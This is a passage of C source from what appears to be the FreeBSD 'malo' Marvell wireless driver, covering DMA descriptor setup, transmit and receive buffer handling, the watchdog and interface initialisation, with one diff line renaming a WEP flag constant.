#endif return (FILTER_HANDLED); } static void malo_load_cb(void *arg, bus_dma_segment_t *segs, int nsegs, int error) { bus_addr_t *paddr = (bus_addr_t*) arg; KASSERT(error == 0, ("error %u on bus_dma callback", error)); *paddr = segs->ds_addr; } static int malo_desc_setup(struct malo_softc *sc, const char *name, struct malo_descdma *dd, int nbuf, size_t bufsize, int ndesc, size_t descsize) { int error; struct ifnet *ifp = sc->malo_ifp; uint8_t *ds; DPRINTF(sc, MALO_DEBUG_RESET, "%s: %s DMA: %u bufs (%ju) %u desc/buf (%ju)\n", __func__, name, nbuf, (uintmax_t) bufsize, ndesc, (uintmax_t) descsize); dd->dd_name = name; dd->dd_desc_len = nbuf * ndesc * descsize; /* * Setup DMA descriptor area. */ error = bus_dma_tag_create(bus_get_dma_tag(sc->malo_dev),/* parent */ PAGE_SIZE, 0, /* alignment, bounds */ BUS_SPACE_MAXADDR_32BIT, /* lowaddr */ BUS_SPACE_MAXADDR, /* highaddr */ NULL, NULL, /* filter, filterarg */ dd->dd_desc_len, /* maxsize */ 1, /* nsegments */ dd->dd_desc_len, /* maxsegsize */ BUS_DMA_ALLOCNOW, /* flags */ NULL, /* lockfunc */ NULL, /* lockarg */ &dd->dd_dmat); if (error != 0) { if_printf(ifp, "cannot allocate %s DMA tag\n", dd->dd_name); return error; } /* allocate descriptors */ error = bus_dmamap_create(dd->dd_dmat, BUS_DMA_NOWAIT, &dd->dd_dmamap); if (error != 0) { if_printf(ifp, "unable to create dmamap for %s descriptors, " "error %u\n", dd->dd_name, error); goto fail0; } error = bus_dmamem_alloc(dd->dd_dmat, (void**) &dd->dd_desc, BUS_DMA_NOWAIT | BUS_DMA_COHERENT, &dd->dd_dmamap); if (error != 0) { if_printf(ifp, "unable to alloc memory for %u %s descriptors, " "error %u\n", nbuf * ndesc, dd->dd_name, error); goto fail1; } error = bus_dmamap_load(dd->dd_dmat, dd->dd_dmamap, dd->dd_desc, dd->dd_desc_len, malo_load_cb, &dd->dd_desc_paddr, BUS_DMA_NOWAIT); if (error != 0) { if_printf(ifp, "unable to map %s descriptors, error %u\n", dd->dd_name, error); goto fail2; } ds = dd->dd_desc; memset(ds, 0, dd->dd_desc_len); DPRINTF(sc, MALO_DEBUG_RESET, "%s: %s DMA map: %p (%lu) -> %p (%lu)\n", __func__, dd->dd_name, ds, (u_long) dd->dd_desc_len, (caddr_t) dd->dd_desc_paddr, /*XXX*/ (u_long) dd->dd_desc_len); return 0; fail2: bus_dmamem_free(dd->dd_dmat, dd->dd_desc, dd->dd_dmamap); fail1: bus_dmamap_destroy(dd->dd_dmat, dd->dd_dmamap); fail0: bus_dma_tag_destroy(dd->dd_dmat); memset(dd, 0, sizeof(*dd)); return error; } #define DS2PHYS(_dd, _ds) \ ((_dd)->dd_desc_paddr + ((caddr_t)(_ds) - (caddr_t)(_dd)->dd_desc)) static int malo_rxdma_setup(struct malo_softc *sc) { struct ifnet *ifp = sc->malo_ifp; int error, bsize, i; struct malo_rxbuf *bf; struct malo_rxdesc *ds; error = malo_desc_setup(sc, "rx", &sc->malo_rxdma, malo_rxbuf, sizeof(struct malo_rxbuf), 1, sizeof(struct 
malo_rxdesc)); if (error != 0) return error; /* * Allocate rx buffers and set them up. */ bsize = malo_rxbuf * sizeof(struct malo_rxbuf); bf = malloc(bsize, M_MALODEV, M_NOWAIT | M_ZERO); if (bf == NULL) { if_printf(ifp, "malloc of %u rx buffers failed\n", bsize); return error; } sc->malo_rxdma.dd_bufptr = bf; STAILQ_INIT(&sc->malo_rxbuf); ds = sc->malo_rxdma.dd_desc; for (i = 0; i < malo_rxbuf; i++, bf++, ds++) { bf->bf_desc = ds; bf->bf_daddr = DS2PHYS(&sc->malo_rxdma, ds); error = bus_dmamap_create(sc->malo_dmat, BUS_DMA_NOWAIT, &bf->bf_dmamap); if (error != 0) { if_printf(ifp, "%s: unable to dmamap for rx buffer, " "error %d\n", __func__, error); return error; } /* NB: tail is intentional to preserve descriptor order */ STAILQ_INSERT_TAIL(&sc->malo_rxbuf, bf, bf_list); } return 0; } static int malo_txdma_setup(struct malo_softc *sc, struct malo_txq *txq) { struct ifnet *ifp = sc->malo_ifp; int error, bsize, i; struct malo_txbuf *bf; struct malo_txdesc *ds; error = malo_desc_setup(sc, "tx", &txq->dma, malo_txbuf, sizeof(struct malo_txbuf), MALO_TXDESC, sizeof(struct malo_txdesc)); if (error != 0) return error; /* allocate and setup tx buffers */ bsize = malo_txbuf * sizeof(struct malo_txbuf); bf = malloc(bsize, M_MALODEV, M_NOWAIT | M_ZERO); if (bf == NULL) { if_printf(ifp, "malloc of %u tx buffers failed\n", malo_txbuf); return ENOMEM; } txq->dma.dd_bufptr = bf; STAILQ_INIT(&txq->free); txq->nfree = 0; ds = txq->dma.dd_desc; for (i = 0; i < malo_txbuf; i++, bf++, ds += MALO_TXDESC) { bf->bf_desc = ds; bf->bf_daddr = DS2PHYS(&txq->dma, ds); error = bus_dmamap_create(sc->malo_dmat, BUS_DMA_NOWAIT, &bf->bf_dmamap); if (error != 0) { if_printf(ifp, "unable to create dmamap for tx " "buffer %u, error %u\n", i, error); return error; } STAILQ_INSERT_TAIL(&txq->free, bf, bf_list); txq->nfree++; } return 0; } static void malo_desc_cleanup(struct malo_softc *sc, struct malo_descdma *dd) { bus_dmamap_unload(dd->dd_dmat, dd->dd_dmamap); bus_dmamem_free(dd->dd_dmat, dd->dd_desc, dd->dd_dmamap); bus_dmamap_destroy(dd->dd_dmat, dd->dd_dmamap); bus_dma_tag_destroy(dd->dd_dmat); memset(dd, 0, sizeof(*dd)); } static void malo_rxdma_cleanup(struct malo_softc *sc) { struct malo_rxbuf *bf; STAILQ_FOREACH(bf, &sc->malo_rxbuf, bf_list) { if (bf->bf_m != NULL) { m_freem(bf->bf_m); bf->bf_m = NULL; } if (bf->bf_dmamap != NULL) { bus_dmamap_destroy(sc->malo_dmat, bf->bf_dmamap); bf->bf_dmamap = NULL; } } STAILQ_INIT(&sc->malo_rxbuf); if (sc->malo_rxdma.dd_bufptr != NULL) { free(sc->malo_rxdma.dd_bufptr, M_MALODEV); sc->malo_rxdma.dd_bufptr = NULL; } if (sc->malo_rxdma.dd_desc_len != 0) malo_desc_cleanup(sc, &sc->malo_rxdma); } static void malo_txdma_cleanup(struct malo_softc *sc, struct malo_txq *txq) { struct malo_txbuf *bf; struct ieee80211_node *ni; STAILQ_FOREACH(bf, &txq->free, bf_list) { if (bf->bf_m != NULL) { m_freem(bf->bf_m); bf->bf_m = NULL; } ni = bf->bf_node; bf->bf_node = NULL; if (ni != NULL) { /* * Reclaim node reference. 
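 * (the reference was taken when the frame was handed to the driver for
 * transmission, so it must be dropped before the buffer is released)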
*/ ieee80211_free_node(ni); } if (bf->bf_dmamap != NULL) { bus_dmamap_destroy(sc->malo_dmat, bf->bf_dmamap); bf->bf_dmamap = NULL; } } STAILQ_INIT(&txq->free); txq->nfree = 0; if (txq->dma.dd_bufptr != NULL) { free(txq->dma.dd_bufptr, M_MALODEV); txq->dma.dd_bufptr = NULL; } if (txq->dma.dd_desc_len != 0) malo_desc_cleanup(sc, &txq->dma); } static void malo_dma_cleanup(struct malo_softc *sc) { int i; for (i = 0; i < MALO_NUM_TX_QUEUES; i++) malo_txdma_cleanup(sc, &sc->malo_txq[i]); malo_rxdma_cleanup(sc); } static int malo_dma_setup(struct malo_softc *sc) { int error, i; /* rxdma initializing. */ error = malo_rxdma_setup(sc); if (error != 0) return error; /* NB: we just have 1 tx queue now. */ for (i = 0; i < MALO_NUM_TX_QUEUES; i++) { error = malo_txdma_setup(sc, &sc->malo_txq[i]); if (error != 0) { malo_dma_cleanup(sc); return error; } malo_txq_init(sc, &sc->malo_txq[i], i); } return 0; } static void malo_hal_set_rxtxdma(struct malo_softc *sc) { int i; malo_bar0_write4(sc, sc->malo_hwspecs.rxdesc_read, sc->malo_hwdma.rxdesc_read); malo_bar0_write4(sc, sc->malo_hwspecs.rxdesc_write, sc->malo_hwdma.rxdesc_read); for (i = 0; i < MALO_NUM_TX_QUEUES; i++) { malo_bar0_write4(sc, sc->malo_hwspecs.wcbbase[i], sc->malo_hwdma.wcbbase[i]); } } /* * Inform firmware of our tx/rx dma setup. The BAR 0 writes below are * for compatibility with older firmware. For current firmware we send * this information with a cmd block via malo_hal_sethwdma. */ static int malo_setup_hwdma(struct malo_softc *sc) { int i; struct malo_txq *txq; sc->malo_hwdma.rxdesc_read = sc->malo_rxdma.dd_desc_paddr; for (i = 0; i < MALO_NUM_TX_QUEUES; i++) { txq = &sc->malo_txq[i]; sc->malo_hwdma.wcbbase[i] = txq->dma.dd_desc_paddr; } sc->malo_hwdma.maxnum_txwcb = malo_txbuf; sc->malo_hwdma.maxnum_wcb = MALO_NUM_TX_QUEUES; malo_hal_set_rxtxdma(sc); return 0; } static void malo_txq_init(struct malo_softc *sc, struct malo_txq *txq, int qnum) { struct malo_txbuf *bf, *bn; struct malo_txdesc *ds; MALO_TXQ_LOCK_INIT(sc, txq); txq->qnum = qnum; txq->txpri = 0; /* XXX */ STAILQ_FOREACH(bf, &txq->free, bf_list) { bf->bf_txq = txq; ds = bf->bf_desc; bn = STAILQ_NEXT(bf, bf_list); if (bn == NULL) bn = STAILQ_FIRST(&txq->free); ds->physnext = htole32(bn->bf_daddr); } STAILQ_INIT(&txq->active); } /* * Reclaim resources for a setup queue. */ static void malo_tx_cleanupq(struct malo_softc *sc, struct malo_txq *txq) { /* XXX hal work? */ MALO_TXQ_LOCK_DESTROY(txq); } /* * Allocate a tx buffer for sending a frame. */ static struct malo_txbuf * malo_getbuf(struct malo_softc *sc, struct malo_txq *txq) { struct malo_txbuf *bf; MALO_TXQ_LOCK(txq); bf = STAILQ_FIRST(&txq->free); if (bf != NULL) { STAILQ_REMOVE_HEAD(&txq->free, bf_list); txq->nfree--; } MALO_TXQ_UNLOCK(txq); if (bf == NULL) { DPRINTF(sc, MALO_DEBUG_XMIT, "%s: out of xmit buffers on q %d\n", __func__, txq->qnum); sc->malo_stats.mst_tx_qstop++; } return bf; } static int malo_tx_dmasetup(struct malo_softc *sc, struct malo_txbuf *bf, struct mbuf *m0) { struct mbuf *m; int error; /* * Load the DMA map so any coalescing is done. This also calculates * the number of descriptors we need. */ error = bus_dmamap_load_mbuf_sg(sc->malo_dmat, bf->bf_dmamap, m0, bf->bf_segs, &bf->bf_nseg, BUS_DMA_NOWAIT); if (error == EFBIG) { /* XXX packet requires too many descriptors */ bf->bf_nseg = MALO_TXDESC + 1; } else if (error != 0) { sc->malo_stats.mst_tx_busdma++; m_freem(m0); return error; } /* * Discard null packets and check for packets that require too many * TX descriptors. 
We try to convert the latter to a cluster. */ if (error == EFBIG) { /* too many desc's, linearize */ sc->malo_stats.mst_tx_linear++; m = m_defrag(m0, M_NOWAIT); if (m == NULL) { m_freem(m0); sc->malo_stats.mst_tx_nombuf++; return ENOMEM; } m0 = m; error = bus_dmamap_load_mbuf_sg(sc->malo_dmat, bf->bf_dmamap, m0, bf->bf_segs, &bf->bf_nseg, BUS_DMA_NOWAIT); if (error != 0) { sc->malo_stats.mst_tx_busdma++; m_freem(m0); return error; } KASSERT(bf->bf_nseg <= MALO_TXDESC, ("too many segments after defrag; nseg %u", bf->bf_nseg)); } else if (bf->bf_nseg == 0) { /* null packet, discard */ sc->malo_stats.mst_tx_nodata++; m_freem(m0); return EIO; } DPRINTF(sc, MALO_DEBUG_XMIT, "%s: m %p len %u\n", __func__, m0, m0->m_pkthdr.len); bus_dmamap_sync(sc->malo_dmat, bf->bf_dmamap, BUS_DMASYNC_PREWRITE); bf->bf_m = m0; return 0; } #ifdef MALO_DEBUG static void malo_printrxbuf(const struct malo_rxbuf *bf, u_int ix) { const struct malo_rxdesc *ds = bf->bf_desc; uint32_t status = le32toh(ds->status); printf("R[%2u] (DS.V:%p DS.P:%p) NEXT:%08x DATA:%08x RC:%02x%s\n" " STAT:%02x LEN:%04x SNR:%02x NF:%02x CHAN:%02x" " RATE:%02x QOS:%04x\n", ix, ds, (const struct malo_desc *)bf->bf_daddr, le32toh(ds->physnext), le32toh(ds->physbuffdata), ds->rxcontrol, ds->rxcontrol != MALO_RXD_CTRL_DRIVER_OWN ? "" : (status & MALO_RXD_STATUS_OK) ? " *" : " !", ds->status, le16toh(ds->pktlen), ds->snr, ds->nf, ds->channel, ds->rate, le16toh(ds->qosctrl)); } static void malo_printtxbuf(const struct malo_txbuf *bf, u_int qnum, u_int ix) { const struct malo_txdesc *ds = bf->bf_desc; uint32_t status = le32toh(ds->status); printf("Q%u[%3u]", qnum, ix); printf(" (DS.V:%p DS.P:%p)\n", ds, (const struct malo_txdesc *)bf->bf_daddr); printf(" NEXT:%08x DATA:%08x LEN:%04x STAT:%08x%s\n", le32toh(ds->physnext), le32toh(ds->pktptr), le16toh(ds->pktlen), status, status & MALO_TXD_STATUS_USED ? "" : (status & 3) != 0 ? " *" : " !"); printf(" RATE:%02x PRI:%x QOS:%04x SAP:%08x FORMAT:%04x\n", ds->datarate, ds->txpriority, le16toh(ds->qosctrl), le32toh(ds->sap_pktinfo), le16toh(ds->format)); #if 0 { const uint8_t *cp = (const uint8_t *) ds; int i; for (i = 0; i < sizeof(struct malo_txdesc); i++) { printf("%02x ", cp[i]); if (((i+1) % 16) == 0) printf("\n"); } printf("\n"); } #endif } #endif /* MALO_DEBUG */ static __inline void malo_updatetxrate(struct ieee80211_node *ni, int rix) { #define N(x) (sizeof(x)/sizeof(x[0])) static const int ieeerates[] = { 2, 4, 11, 22, 44, 12, 18, 24, 36, 48, 96, 108 }; if (rix < N(ieeerates)) ni->ni_txrate = ieeerates[rix]; #undef N } static int malo_fix2rate(int fix_rate) { #define N(x) (sizeof(x)/sizeof(x[0])) static const int rates[] = { 2, 4, 11, 22, 12, 18, 24, 36, 48, 96, 108 }; return (fix_rate < N(rates) ? rates[fix_rate] : 0); #undef N } /* idiomatic shorthands: MS = mask+shift, SM = shift+mask */ #define MS(v,x) (((v) & x) >> x##_S) #define SM(v,x) (((v) << x##_S) & x) /* * Process completed xmit descriptors from the specified queue. 
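 * Buffers are reaped from the head of the active list until a descriptor
 * still owned by the firmware (MALO_TXD_STATUS_FW_OWNED) is found; each
 * completed buffer is unmapped, its node reference dropped, and the
 * buffer returned to the free list.  The MS() shorthand above is used to
 * pull fields such as the tx antenna out of the descriptor format word.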
*/ static int malo_tx_processq(struct malo_softc *sc, struct malo_txq *txq) { struct malo_txbuf *bf; struct malo_txdesc *ds; struct ieee80211_node *ni; int nreaped; uint32_t status; DPRINTF(sc, MALO_DEBUG_TX_PROC, "%s: tx queue %u\n", __func__, txq->qnum); for (nreaped = 0;; nreaped++) { MALO_TXQ_LOCK(txq); bf = STAILQ_FIRST(&txq->active); if (bf == NULL) { MALO_TXQ_UNLOCK(txq); break; } ds = bf->bf_desc; MALO_TXDESC_SYNC(txq, ds, BUS_DMASYNC_POSTREAD | BUS_DMASYNC_POSTWRITE); if (ds->status & htole32(MALO_TXD_STATUS_FW_OWNED)) { MALO_TXQ_UNLOCK(txq); break; } STAILQ_REMOVE_HEAD(&txq->active, bf_list); MALO_TXQ_UNLOCK(txq); #ifdef MALO_DEBUG if (sc->malo_debug & MALO_DEBUG_XMIT_DESC) malo_printtxbuf(bf, txq->qnum, nreaped); #endif ni = bf->bf_node; if (ni != NULL) { status = le32toh(ds->status); if (status & MALO_TXD_STATUS_OK) { uint16_t format = le16toh(ds->format); uint8_t txant = MS(format, MALO_TXD_ANTENNA); sc->malo_stats.mst_ant_tx[txant]++; if (status & MALO_TXD_STATUS_OK_RETRY) sc->malo_stats.mst_tx_retries++; if (status & MALO_TXD_STATUS_OK_MORE_RETRY) sc->malo_stats.mst_tx_mretries++; malo_updatetxrate(ni, ds->datarate); sc->malo_stats.mst_tx_rate = ds->datarate; } else { if (status & MALO_TXD_STATUS_FAILED_LINK_ERROR) sc->malo_stats.mst_tx_linkerror++; if (status & MALO_TXD_STATUS_FAILED_XRETRY) sc->malo_stats.mst_tx_xretries++; if (status & MALO_TXD_STATUS_FAILED_AGING) sc->malo_stats.mst_tx_aging++; } /* * Do any tx complete callback. Note this must * be done before releasing the node reference. * XXX no way to figure out if frame was ACK'd */ if (bf->bf_m->m_flags & M_TXCB) { /* XXX strip fw len in case header inspected */ m_adj(bf->bf_m, sizeof(uint16_t)); ieee80211_process_callback(ni, bf->bf_m, (status & MALO_TXD_STATUS_OK) == 0); } /* * Reclaim reference to node. * * NB: the node may be reclaimed here if, for example * this is a DEAUTH message that was sent and the * node was timed out due to inactivity. */ ieee80211_free_node(ni); } ds->status = htole32(MALO_TXD_STATUS_IDLE); ds->pktlen = htole32(0); bus_dmamap_sync(sc->malo_dmat, bf->bf_dmamap, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->malo_dmat, bf->bf_dmamap); m_freem(bf->bf_m); bf->bf_m = NULL; bf->bf_node = NULL; MALO_TXQ_LOCK(txq); STAILQ_INSERT_TAIL(&txq->free, bf, bf_list); txq->nfree++; MALO_TXQ_UNLOCK(txq); } return nreaped; } /* * Deferred processing of transmit interrupt. */ static void malo_tx_proc(void *arg, int npending) { struct malo_softc *sc = arg; struct ifnet *ifp = sc->malo_ifp; int i, nreaped; /* * Process each active queue. 
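 * If anything was reaped, clear IFF_DRV_OACTIVE, reset the watchdog
 * timer and kick malo_start() to push any frames that were waiting for
 * free tx buffers.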
*/ nreaped = 0; for (i = 0; i < MALO_NUM_TX_QUEUES; i++) { if (!STAILQ_EMPTY(&sc->malo_txq[i].active)) nreaped += malo_tx_processq(sc, &sc->malo_txq[i]); } if (nreaped != 0) { ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; sc->malo_timer = 0; malo_start(ifp); } } static int malo_tx_start(struct malo_softc *sc, struct ieee80211_node *ni, struct malo_txbuf *bf, struct mbuf *m0) { #define IEEE80211_DIR_DSTODS(wh) \ ((wh->i_fc[1] & IEEE80211_FC1_DIR_MASK) == IEEE80211_FC1_DIR_DSTODS) #define IS_DATA_FRAME(wh) \ ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK)) == IEEE80211_FC0_TYPE_DATA) int error, ismcast, iswep; int copyhdrlen, hdrlen, pktlen; struct ieee80211_frame *wh; struct ifnet *ifp = sc->malo_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct malo_txdesc *ds; struct malo_txrec *tr; struct malo_txq *txq; uint16_t qos; wh = mtod(m0, struct ieee80211_frame *); - iswep = wh->i_fc[1] & IEEE80211_FC1_WEP; + iswep = wh->i_fc[1] & IEEE80211_FC1_PROTECTED; ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); copyhdrlen = hdrlen = ieee80211_anyhdrsize(wh); pktlen = m0->m_pkthdr.len; if (IEEE80211_QOS_HAS_SEQ(wh)) { if (IEEE80211_DIR_DSTODS(wh)) { qos = *(uint16_t *) (((struct ieee80211_qosframe_addr4 *) wh)->i_qos); copyhdrlen -= sizeof(qos); } else qos = *(uint16_t *) (((struct ieee80211_qosframe *) wh)->i_qos); } else qos = 0; if (iswep) { struct ieee80211_key *k; /* * Construct the 802.11 header+trailer for an encrypted * frame. The only reason this can fail is because of an * unknown or unsupported cipher/key type. * * NB: we do this even though the firmware will ignore * what we've done for WEP and TKIP as we need the * ExtIV filled in for CCMP and this also adjusts * the headers which simplifies our work below. */ k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { /* * This can happen when the key is yanked after the * frame was queued. Just discard the frame; the * 802.11 layer counts failures and provides * debugging/diagnostics. */ m_freem(m0); return EIO; } /* * Adjust the packet length for the crypto additions * done during encap and any other bits that the f/w * will add later on. */ pktlen = m0->m_pkthdr.len; /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } if (ieee80211_radiotap_active_vap(vap)) { sc->malo_tx_th.wt_flags = 0; /* XXX */ if (iswep) sc->malo_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_WEP; sc->malo_tx_th.wt_txpower = ni->ni_txpower; sc->malo_tx_th.wt_antenna = sc->malo_txantenna; ieee80211_radiotap_tx(vap, m0); } /* * Copy up/down the 802.11 header; the firmware requires * we present a 2-byte payload length followed by a * 4-address header (w/o QoS), followed (optionally) by * any WEP/ExtIV header (but only filled in for CCMP). * We are assured the mbuf has sufficient headroom to * prepend in-place by the setup of ic_headroom in * malo_attach. */ if (hdrlen < sizeof(struct malo_txrec)) { const int space = sizeof(struct malo_txrec) - hdrlen; if (M_LEADINGSPACE(m0) < space) { /* NB: should never happen */ device_printf(sc->malo_dev, "not enough headroom, need %d found %zd, " "m_flags 0x%x m_len %d\n", space, M_LEADINGSPACE(m0), m0->m_flags, m0->m_len); ieee80211_dump_pkt(ic, mtod(m0, const uint8_t *), m0->m_len, 0, -1); m_freem(m0); /* XXX stat */ return EIO; } M_PREPEND(m0, space, M_NOWAIT); } tr = mtod(m0, struct malo_txrec *); if (wh != (struct ieee80211_frame *) &tr->wh) ovbcopy(wh, &tr->wh, hdrlen); /* * Note: the "firmware length" is actually the length of the fully * formed "802.11 payload". 
That is, it's everything except for * the 802.11 header. In particular this includes all crypto * material including the MIC! */ tr->fwlen = htole16(pktlen - hdrlen); /* * Load the DMA map so any coalescing is done. This * also calculates the number of descriptors we need. */ error = malo_tx_dmasetup(sc, bf, m0); if (error != 0) return error; bf->bf_node = ni; /* NB: held reference */ m0 = bf->bf_m; /* NB: may have changed */ tr = mtod(m0, struct malo_txrec *); wh = (struct ieee80211_frame *)&tr->wh; /* * Formulate tx descriptor. */ ds = bf->bf_desc; txq = bf->bf_txq; ds->qosctrl = qos; /* NB: already little-endian */ ds->pktptr = htole32(bf->bf_segs[0].ds_addr); ds->pktlen = htole16(bf->bf_segs[0].ds_len); /* NB: pPhysNext setup once, don't touch */ ds->datarate = IS_DATA_FRAME(wh) ? 1 : 0; ds->sap_pktinfo = 0; ds->format = 0; /* * Select transmit rate. */ switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_MGT: sc->malo_stats.mst_tx_mgmt++; /* fall thru... */ case IEEE80211_FC0_TYPE_CTL: ds->txpriority = 1; break; case IEEE80211_FC0_TYPE_DATA: ds->txpriority = txq->qnum; break; default: if_printf(ifp, "bogus frame type 0x%x (%s)\n", wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK, __func__); /* XXX statistic */ m_freem(m0); return EIO; } #ifdef MALO_DEBUG if (IFF_DUMPPKTS_XMIT(sc)) ieee80211_dump_pkt(ic, mtod(m0, const uint8_t *)+sizeof(uint16_t), m0->m_len - sizeof(uint16_t), ds->datarate, -1); #endif MALO_TXQ_LOCK(txq); if (!IS_DATA_FRAME(wh)) ds->status |= htole32(1); ds->status |= htole32(MALO_TXD_STATUS_FW_OWNED); STAILQ_INSERT_TAIL(&txq->active, bf, bf_list); MALO_TXDESC_SYNC(txq, ds, BUS_DMASYNC_PREREAD | BUS_DMASYNC_PREWRITE); ifp->if_opackets++; sc->malo_timer = 5; MALO_TXQ_UNLOCK(txq); return 0; #undef IEEE80211_DIR_DSTODS } static void malo_start(struct ifnet *ifp) { struct malo_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct malo_txq *txq = &sc->malo_txq[0]; struct malo_txbuf *bf = NULL; struct mbuf *m; int nqueued = 0; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || sc->malo_invalid) return; for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; bf = malo_getbuf(sc, txq); if (bf == NULL) { IFQ_DRV_PREPEND(&ifp->if_snd, m); /* XXX blocks other traffic */ ifp->if_drv_flags |= IFF_DRV_OACTIVE; sc->malo_stats.mst_tx_qstop++; break; } /* * Pass the frame to the h/w for transmission. */ if (malo_tx_start(sc, ni, bf, m)) { ifp->if_oerrors++; if (bf != NULL) { bf->bf_m = NULL; bf->bf_node = NULL; MALO_TXQ_LOCK(txq); STAILQ_INSERT_HEAD(&txq->free, bf, bf_list); MALO_TXQ_UNLOCK(txq); } ieee80211_free_node(ni); continue; } nqueued++; if (nqueued >= malo_txcoalesce) { /* * Poke the firmware to process queued frames; * see below about (lack of) locking. */ nqueued = 0; malo_hal_txstart(sc->malo_mh, 0/*XXX*/); } } if (nqueued) { /* * NB: We don't need to lock against tx done because * this just prods the firmware to check the transmit * descriptors. The firmware will also start fetching * descriptors by itself if it notices new ones are * present when it goes to deliver a tx done interrupt * to the host. So if we race with tx done processing * it's ok. Delivering the kick here rather than in * malo_tx_start is an optimization to avoid poking the * firmware for each packet. * * NB: the queue id isn't used so 0 is ok. 
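 * The same kick is issued every malo_txcoalesce frames inside the loop
 * above so the firmware can start on a large burst before the queue has
 * been fully drained.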
*/ malo_hal_txstart(sc->malo_mh, 0/*XXX*/); } } static void malo_watchdog(void *arg) { struct malo_softc *sc; struct ifnet *ifp; sc = arg; callout_reset(&sc->malo_watchdog_timer, hz, malo_watchdog, sc); if (sc->malo_timer == 0 || --sc->malo_timer > 0) return; ifp = sc->malo_ifp; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) && !sc->malo_invalid) { if_printf(ifp, "watchdog timeout\n"); /* XXX no way to reset h/w. now */ ifp->if_oerrors++; sc->malo_stats.mst_watchdog++; } } static int malo_hal_reset(struct malo_softc *sc) { static int first = 0; struct ifnet *ifp = sc->malo_ifp; struct ieee80211com *ic = ifp->if_l2com; struct malo_hal *mh = sc->malo_mh; if (first == 0) { /* * NB: when the device firstly is initialized, sometimes * firmware could override rx/tx dma registers so we re-set * these values once. */ malo_hal_set_rxtxdma(sc); first = 1; } malo_hal_setantenna(mh, MHA_ANTENNATYPE_RX, sc->malo_rxantenna); malo_hal_setantenna(mh, MHA_ANTENNATYPE_TX, sc->malo_txantenna); malo_hal_setradio(mh, 1, MHP_AUTO_PREAMBLE); malo_chan_set(sc, ic->ic_curchan); /* XXX needs other stuffs? */ return 1; } static __inline struct mbuf * malo_getrxmbuf(struct malo_softc *sc, struct malo_rxbuf *bf) { struct mbuf *m; bus_addr_t paddr; int error; /* XXX don't need mbuf, just dma buffer */ m = m_getjcl(M_NOWAIT, MT_DATA, M_PKTHDR, MJUMPAGESIZE); if (m == NULL) { sc->malo_stats.mst_rx_nombuf++; /* XXX */ return NULL; } error = bus_dmamap_load(sc->malo_dmat, bf->bf_dmamap, mtod(m, caddr_t), MJUMPAGESIZE, malo_load_cb, &paddr, BUS_DMA_NOWAIT); if (error != 0) { if_printf(sc->malo_ifp, "%s: bus_dmamap_load failed, error %d\n", __func__, error); m_freem(m); return NULL; } bf->bf_data = paddr; bus_dmamap_sync(sc->malo_dmat, bf->bf_dmamap, BUS_DMASYNC_PREWRITE); return m; } static int malo_rxbuf_init(struct malo_softc *sc, struct malo_rxbuf *bf) { struct malo_rxdesc *ds; ds = bf->bf_desc; if (bf->bf_m == NULL) { bf->bf_m = malo_getrxmbuf(sc, bf); if (bf->bf_m == NULL) { /* mark descriptor to be skipped */ ds->rxcontrol = MALO_RXD_CTRL_OS_OWN; /* NB: don't need PREREAD */ MALO_RXDESC_SYNC(sc, ds, BUS_DMASYNC_PREWRITE); return ENOMEM; } } /* * Setup descriptor. */ ds->qosctrl = 0; ds->snr = 0; ds->status = MALO_RXD_STATUS_IDLE; ds->channel = 0; ds->pktlen = htole16(MALO_RXSIZE); ds->nf = 0; ds->physbuffdata = htole32(bf->bf_data); /* NB: don't touch pPhysNext, set once */ ds->rxcontrol = MALO_RXD_CTRL_DRIVER_OWN; MALO_RXDESC_SYNC(sc, ds, BUS_DMASYNC_PREREAD | BUS_DMASYNC_PREWRITE); return 0; } /* * Setup the rx data structures. This should only be done once or we may get * out of sync with the firmware. */ static int malo_startrecv(struct malo_softc *sc) { struct malo_rxbuf *bf, *prev; struct malo_rxdesc *ds; if (sc->malo_recvsetup == 1) { malo_mode_init(sc); /* set filters, etc. */ return 0; } prev = NULL; STAILQ_FOREACH(bf, &sc->malo_rxbuf, bf_list) { int error = malo_rxbuf_init(sc, bf); if (error != 0) { DPRINTF(sc, MALO_DEBUG_RECV, "%s: malo_rxbuf_init failed %d\n", __func__, error); return error; } if (prev != NULL) { ds = prev->bf_desc; ds->physnext = htole32(bf->bf_daddr); } prev = bf; } if (prev != NULL) { ds = prev->bf_desc; ds->physnext = htole32(STAILQ_FIRST(&sc->malo_rxbuf)->bf_daddr); } sc->malo_recvsetup = 1; malo_mode_init(sc); /* set filters, etc. 
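 * (promiscuous mode and the multicast address list)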
*/ return 0; } static void malo_init_locked(struct malo_softc *sc) { struct ifnet *ifp = sc->malo_ifp; struct malo_hal *mh = sc->malo_mh; int error; DPRINTF(sc, MALO_DEBUG_ANY, "%s: if_flags 0x%x\n", __func__, ifp->if_flags); MALO_LOCK_ASSERT(sc); /* * Stop anything previously setup. This is safe whether this is * the first time through or not. */ malo_stop_locked(ifp, 0); /* * Push state to the firmware. */ if (!malo_hal_reset(sc)) { if_printf(ifp, "%s: unable to reset hardware\n", __func__); return; } /* * Setup recv (once); transmit is already good to go. */ error = malo_startrecv(sc); if (error != 0) { if_printf(ifp, "%s: unable to start recv logic, error %d\n", __func__, error); return; } /* * Enable interrupts. */ sc->malo_imask = MALO_A2HRIC_BIT_RX_RDY | MALO_A2HRIC_BIT_TX_DONE | MALO_A2HRIC_BIT_OPC_DONE | MALO_A2HRIC_BIT_MAC_EVENT | MALO_A2HRIC_BIT_RX_PROBLEM | MALO_A2HRIC_BIT_ICV_ERROR | MALO_A2HRIC_BIT_RADAR_DETECT | MALO_A2HRIC_BIT_CHAN_SWITCH; ifp->if_drv_flags |= IFF_DRV_RUNNING; malo_hal_intrset(mh, sc->malo_imask); 